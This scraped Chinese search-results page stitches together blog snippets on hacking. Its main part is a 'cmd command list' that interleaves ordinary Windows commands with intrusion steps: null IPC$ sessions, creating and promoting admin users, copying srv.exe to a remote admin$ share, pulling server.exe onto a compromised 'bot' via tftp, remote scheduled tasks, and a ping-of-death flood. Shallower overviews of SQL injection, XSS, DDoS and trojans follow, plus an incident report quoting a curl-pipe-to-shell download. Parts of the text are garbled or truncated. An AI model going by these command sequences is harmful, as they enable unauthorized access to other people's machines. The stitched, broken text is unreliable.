精华内容
参与话题
问答
  • cmd 命令 大全

    万次阅读 多人点赞 2019-01-29 13:09:02
    前言: CMD是什么?在windows环境下,命令行程序为cmd.exe。 是一个32位的命令行程序,微软Windows系统基于Windows上的命令解释程序。...类似于微软的DOS操作系统。输入一些命令,cmd.exe可以执行。...

    前言:

    ,

    net use ipipc$ " " /user:" " 建立IPC空链接
    net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
    net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
    net use h: ipc$ 登陆后映射对方C:到本地为H:
    net use ipipc$ /del 删除IPC链接
    net use h: /del 删除映射对方到本地的为H:的映射
    net user 用户名 密码 /add 建立用户
    net user guest /active:yes 激活guest用户
    net user 查看有哪些用户
    net user 帐户名 查看帐户的属性
    net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
    net start 查看开启了哪些服务
    net start 服务名 开启服务;(如:net start telnet, net start schedule)
    net stop 服务名 停止某服务
    net time 目标ip 查看对方时间
    net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
    net view 查看本地局域网内开启了哪些共享
    net view ip 查看对方局域网内开启了哪些共享
    net config 显示系统网络设置
    net logoff 断开连接的共享
    net pause 服务名 暂停某服务
    net send ip "文本信息" 向对方发信息
    net ver 局域网内正在使用的网络连接类型和信息
    net share 查看本地开启的共享
    net share ipc$ 开启ipc$共享
    net share ipc$ /del 删除ipc$共享
    net share c$ /del 删除C:共享
    net user guest 12345 用guest用户登陆后用将密码改为12345
    net password 密码 更改系统登陆密码
    netstat -a 查看开启了哪些端口,常用netstat -an
    netstat -n 查看端口的网络连接情况,常用netstat -an
    netstat -v 查看正在进行的工作
    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
    netstat -s 查看正在使用的所有协议使用情况
    nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
    tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
    ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
    ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
    ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
              例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
    del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
    move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
    fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
    at id号 开启已注册的某个计划任务
    at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
    at id号 /delete 停止某个已注册的计划任务
    at 查看所有的计划任务
    at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
    finger username @host 查看最近有哪些用户登陆
    telnet ip 端口 远和登陆服务器,默认端口为23
    open ip 连接到IP(属telnet登陆后的命令)
    telnet 在本机上直接键入telnet 将进入本机的telnet
    copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
    copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
    cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
    copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
    xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送


    tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
    ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
    arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
    start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
    mem 查看cpu使用情况
    attrib 文件名(目录名) 查看某文件(目录)的属性
    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
    date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
    set 指定环境变量名称=要指派给变量的字符 设置环境变量
    set 显示当前所有的环境变量
    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
    pause 暂停批处理程序,并显示出:请按任意键继续....
    if 在批处理程序中执行条件处理(更多说明见if命令及变量)
    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
    call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
    for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
    echo 信息 在屏幕上显示出信息
    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
    find 文件名 查找某文件. 

    展开全文
  • 近年来,针对网站的黑客在线攻击事件迅速增加,同样的风险仍然很容易被利用。国内知名黑客安全组织东方联盟表示:这些通常很容易在浏览器中直接识别; 这只是了解要寻找的易受攻击模式的问题。从攻击者的角度来看,...

      近年来,针对网站的黑客在线攻击事件迅速增加,同样的风险仍然很容易被利用。国内知名黑客安全组织东方联盟表示:这些通常很容易在浏览器中直接识别; 这只是了解要寻找的易受攻击模式的问题。从攻击者的角度来看,它们的入口点通常是浏览器。他们有一个网站,他们想要调查安全风险,这是他们如何去做的。与审查源代码相比,这种方法更能反映真实的在线威胁,它使开发人员能够立即开始评估他们的应用程序,即使他们在没有访问源的实时环境中运行。毕竟,这就是在线攻击者正在做的事情。

    黑客攻击Web应用程序

      当涉及到保护敏感的客户数据,财务记录和声誉时,Web应用程序的安全配置文件非常重要。然而,Web应用程序往往是恶意攻击者的目标,他们试图通过利用软件中的漏洞来破坏这些东西。大多数针对Web应用程序的攻击都利用众所周知的漏洞,因为这些漏洞已经经过了久经考验的防御措施,黑客可以通过Web应用程序漏洞来进行提权; 而作为一个专业技术人员,应具备攻防能力专业知识,对于构建当今在Web上正确保护应用程序所需的功能至关重要。


    黑客社会工程

      信息系统中的安全防御主要侧重于技术控制,即在物理设备和软件中实施安全。当人类自身受到社会工程攻击的危害时,这些控制措施经常被绕过。社会工程涉及妥协使用这些系统的个人。攻击者希望利用人性中的弱点,并强迫人们采取行动,给攻击者带来好处。

     

    黑客SQL注入

      自从我们开始将网站连接到数据库以来,SQL注入一直是严重的安全风险,并带来可怕的后果。攻击者针对易受攻击的系统运行任意查询的能力可能会导致数据暴露,修改以及在某些情况下导致整个系统的损害,SQL注入被归类为今日网络上的头号风险。这很容易被发现,很容易被利用,并且成功攻击的影响是严重的。再加上注入风险依然猖獗的事实,很明显它应该如何配得上第一名。东方联盟黑客安全研究人员曾说,Web技术人员应学会了解攻击者使用的SQL语法,基本注入攻击,数据库发现和数据泄露,先进的概念,甚至使用注入进行网络侦察和运行系统命令,多接触黑客相关技术,做一个合格攻防技术必备程序员。​

    展开全文
  • 黑客攻击常用手段

    千次阅读 2018-11-13 12:49:10
    黑客攻击常用手段 0day漏洞是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。信息安全意义上的0Day是指在系统商在知晓并发布相关补丁前就被掌握或者公开的漏洞信息。 特洛伊木马属于客户/服务模式。它...

    黑客攻击常用手段

    0day漏洞是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。信息安全意义上的0Day是指在系统商在知晓并发布相关补丁前就被掌握或者公开的漏洞信息。

    特洛伊木马属于客户/服务模式。它分为两大部分,即客户端服务端。其原理是一台主机提供服务(服务器),另一台主机接受服务(客户机),作为服务器的主机一般会打开一个默认的端口进行监听。

    在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。

    僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。攻击者通过各种途径传播僵尸程序感染互联网上的大量主机,而被感染的主机将通过一个控制信道接收攻击者的指令,组成一个僵尸网络。

    分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在网络上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。

    DDoS攻击是利用服务请求来耗尽被攻击网络的系统资源,从而使被攻击网络无法处理合法用户的请求。 DDoS 攻击有多种形式,但是能看到的最典型的就是流量溢出,它可以消耗大量的带宽,却不消耗应用程序资源。最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。僵尸网络为 DDoS 攻击提供了所需的“火力”带宽和计算机以及管理攻击所需的基础架构。

    水坑攻击(Watering hole,APT攻击的一种)是一种计算机入侵手法,其针对的目标多为特定的团体(组织、行业、地区等)。攻击者首先通过猜测(或观察)确定这组目标经常访问的网站,并入侵其中一个或多个,植入恶意软件,最后,达到感染该组目标中部分成员的目的。由于此种攻击借助了目标团体所信任的网站,攻击成功率很高,即便是那些对鱼叉攻击或其他形式的钓鱼攻击具有防护能力的团体。

    鱼叉攻击”是黑客攻击方式之一,最常见的做法是,将木马程序作为电子邮件的附件,并起上一个极具诱惑力的名称,发送给目标电脑,诱使受害者打开附件,从而感染木马。

    Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的, Shellcode是溢出程序和蠕虫病毒的核心。

    蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,有两种类型的蠕虫:主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中,并且使用网络的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫"野兔",蠕虫病毒一般是通过1434端口漏洞传播。

    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。

    XSS攻击全称跨站脚本攻击,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。

    展开全文
  • 黑客攻击流程

    千次阅读 2018-04-04 11:41:26
    黑客攻击流程1.确定目标2.扫描开放的端口或系统漏洞3.破解账号和密码4.实现目的
    黑客攻击流程

    1.确定目标
    2.扫描开放的端口或系统漏洞
    3.破解账号和密码
    4.实现目的

    展开全文
  • 一次被黑客攻击的亲身经历

    千次阅读 2018-07-19 16:07:00
    如今在互联网畅游的人们对于黑客并不陌生,“黑客”这样的字眼到处可见。然而大多数人也只是听说而已,本身并没有感到其危险性。即使那天自己的电脑被攻击了,也不知道问题到底出在那里,简单杀杀毒或者干脆重装OS ...
  • 1、逻辑炸弹引爆西伯利亚 在1982年,在里根gov的CIA发现了克格勃窃取从西方窃取技术已经很多年了。对此,美国中央情报局决定给克格勃设一个巨大的陷阱,而这个陷阱很有可能是历史上第一次使用的木马病毒。...
  • 黑客攻击之网络入侵——物理攻击

    千次阅读 2017-11-15 18:05:00
    黑客攻击之网络入侵——物理攻击 作者:许本新 目前网络网络中最常用的攻击手段主要有以下几种: n社会工程学攻击 n物理攻击 n暴力攻击 n利用Unicode漏洞攻击 n利用缓冲区溢出漏洞进行攻击等技术。 ...
  • 黑客攻击的一般过程

    千次阅读 2015-11-27 13:06:52
    攻击:收集信息,进行进一步攻击决策–内容:获得域名及IP分布,获得拓扑及os等,获得端口和服务,获得应用系统情况,跟踪新漏洞发布攻击: 进行攻击,获得系统的一定权限–内容:获得远程权限,进入远程系统,...
  • 常见黑客攻击类型

    万次阅读 2006-11-19 14:23:00
     1.5.2 常见黑客攻击类型虽然黑客攻击的手法多种多样,但就目前来说,绝大多数中初级黑客们所采用的手法和工具仍具有许多共性。从大的方面来划分的话,归纳起来一般不外乎以下几种:1. 网络报文嗅探网络嗅探其实...
  • 模仿黑客攻击的渗透测试流程

    千次阅读 2017-03-23 22:39:45
    黑客脑图
  • 臭名昭著的黑客攻击事件 20件

    千次阅读 2016-04-24 21:55:43
    史上最臭名昭著的20次网络攻击 2015-8-29 22:12:56来源:雷锋网作者:老吕IO责编:汐元 评论:135               网络世界的冲突是真实世界的延续,所以网络...
  • 记一次阿里云黑客攻击事件

    千次阅读 2018-04-07 12:36:23
    这几天服务器一直发生异常行为,阿里云报警如下:根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件访问这个地址:...
  • iPviking:在线黑客攻击可视化地图有一个由挪威公司对全世界互联网数据流攻击进行的实时检测可视化数据图,用户可以直观的看到世界各地的攻击数据,这个检测平台可以监测到网络上的各种攻击方式,来源于哪个国家等...
  • 黑客攻击流程图

    千次阅读 2015-03-20 10:34:13
    黑客攻击流程图
  • 公司遭受黑客攻击之后怎么办?作为公司的运维安全人员,如何撰写报告
  • 黑客攻击常用端口

    千次阅读 2019-04-17 17:51:05
    黑客攻击常用端口 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP...
  • 一提到网络安全,相信大部分立刻联想到那个黑色五月的早晨,周围所有人被WannaCry病毒支配的恐惧,勒索病毒一夜席卷全球,勒索软件入侵电脑,将文件加密锁定,要求受害者支付比特币才能解锁文件。...
  • 黑客攻击五大步骤

    千次阅读 2012-10-09 20:25:35
     根据来自国际电子商务顾问局白帽黑客认证的资料显示,成功的黑客攻击包含了五个步骤:搜索、扫描、获得权限、保持连接,消除痕迹。在本文中,我们就将对每个阶段进行详细的分析。在将来的文章中,我还会对检测方式...
  • 一次被黑客攻击的亲身经历

    千次阅读 2009-11-21 18:22:00
    margin: 2cm } P { margin-bottom: 0.21cm } -->  一次被黑客攻击的亲身经历 如今在互联网畅游的人们对于黑客并不陌生,“黑客”这样的字眼到处可见。然而大多数人也只是听说而已,本身并没有感到其危险性。即使...
  • 支付宝被黑客攻击了...

    千次阅读 2019-02-27 00:00:00
    作者 | 史中来源 | 浅黑科技(ID:qianheikeji)“支付宝被黑客搞了!!!”女票发给我一段视频。中哥我虎躯一震,这么大的事儿居委会咋没通知我??赶紧打开视频...

空空如也

1 2 3 4 5 ... 20
收藏数 93,868
精华内容 37,547
关键字:

黑客攻击